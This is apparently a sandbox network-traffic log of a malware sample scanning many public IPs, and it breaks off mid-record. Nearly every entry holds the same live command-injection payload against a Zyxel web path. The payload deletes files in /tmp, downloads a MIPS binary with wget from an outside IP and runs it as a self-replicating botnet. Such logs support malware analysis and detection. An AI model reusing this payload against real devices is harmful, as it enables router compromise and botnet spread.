                                        48192.168.2.234059054.244.42.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:15.059499979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        49192.168.2.2338786137.27.160.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:15.059551954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        50192.168.2.234660240.2.70.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:15.059609890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        51192.168.2.2351608168.98.227.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:15.059678078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        52192.168.2.233716497.116.56.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:15.059722900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        53192.168.2.2347924119.205.178.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:15.059977055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        54192.168.2.2345808159.40.230.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074028969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        55192.168.2.2339356161.99.47.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074064970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        56192.168.2.2358234186.74.251.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074103117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        57192.168.2.234194283.231.238.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074141979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        58192.168.2.235919860.221.243.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074182987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        59192.168.2.233952239.84.159.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074227095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        60192.168.2.233339063.11.31.0443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074306011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        61192.168.2.2349648120.113.124.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074336052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        62192.168.2.2353918142.135.32.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074400902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        63192.168.2.233852265.195.127.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074424028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        64192.168.2.2338114106.61.168.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074465036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        65192.168.2.234645042.95.140.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074527025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        66192.168.2.233681644.105.115.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074562073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        67192.168.2.2350424197.170.119.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074610949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        68192.168.2.234299214.13.8.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074682951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        69192.168.2.234625679.132.150.206443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074717999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        70192.168.2.2357590211.159.92.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074748993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        71192.168.2.2351220218.214.58.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074790001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        72192.168.2.235888478.73.201.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074841976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        73192.168.2.2349878188.12.106.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074903965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        74192.168.2.234876271.147.145.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074934959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        75192.168.2.23332402.15.3.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.074990988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        76192.168.2.2354826120.20.104.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075015068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        77192.168.2.2337818162.27.2.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075064898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        78192.168.2.2350796155.75.12.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075110912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        79192.168.2.23417961.153.159.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075158119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        80192.168.2.2350092163.211.157.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075216055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        81192.168.2.235096257.172.36.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075246096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        82192.168.2.233934227.9.77.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075304031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        83192.168.2.2355320135.77.4.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075351954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        84192.168.2.2352598192.16.179.178443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075386047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        85192.168.2.2350992159.239.86.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075433016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        86192.168.2.2357752167.110.22.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075473070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        87192.168.2.2353796135.91.52.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075505972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        88192.168.2.2343812123.108.37.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075546026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        89192.168.2.2355406110.15.37.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075592041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        90192.168.2.2336020220.210.30.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075634003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        91192.168.2.235068253.102.109.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075660944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        92192.168.2.233522897.72.192.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075738907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        93192.168.2.234043270.2.128.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075778008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        94192.168.2.2337864103.237.81.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075838089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        95192.168.2.2360320218.55.247.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075879097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        96192.168.2.233554096.110.136.20443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075917959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        97192.168.2.2358890151.152.5.134443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.075968027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        98192.168.2.2335014197.188.42.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076009989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        99192.168.2.2335144117.38.208.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076047897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        100192.168.2.233893240.183.54.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076103926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        101192.168.2.234975448.69.194.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076165915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        102192.168.2.2353694199.106.4.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076200008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        103192.168.2.233439687.202.107.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076247931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        104192.168.2.2358870213.254.127.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076301098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        105192.168.2.2336590168.149.175.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076327085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        106192.168.2.2349328118.46.237.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076360941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        107192.168.2.2349176163.102.250.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076406956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        108192.168.2.233800254.77.96.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076436996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        109192.168.2.2343998111.202.203.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076497078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        110192.168.2.2357894103.244.43.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076529980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        111192.168.2.235982651.37.78.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076582909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        112192.168.2.2351510182.237.61.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076611996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        113192.168.2.233760651.252.28.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076649904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        114192.168.2.235563484.117.218.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076685905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        115192.168.2.234234299.254.43.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:16.076720953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        116192.168.2.234842217.139.199.55443
                                        TimestampBytes transferredDirectionData
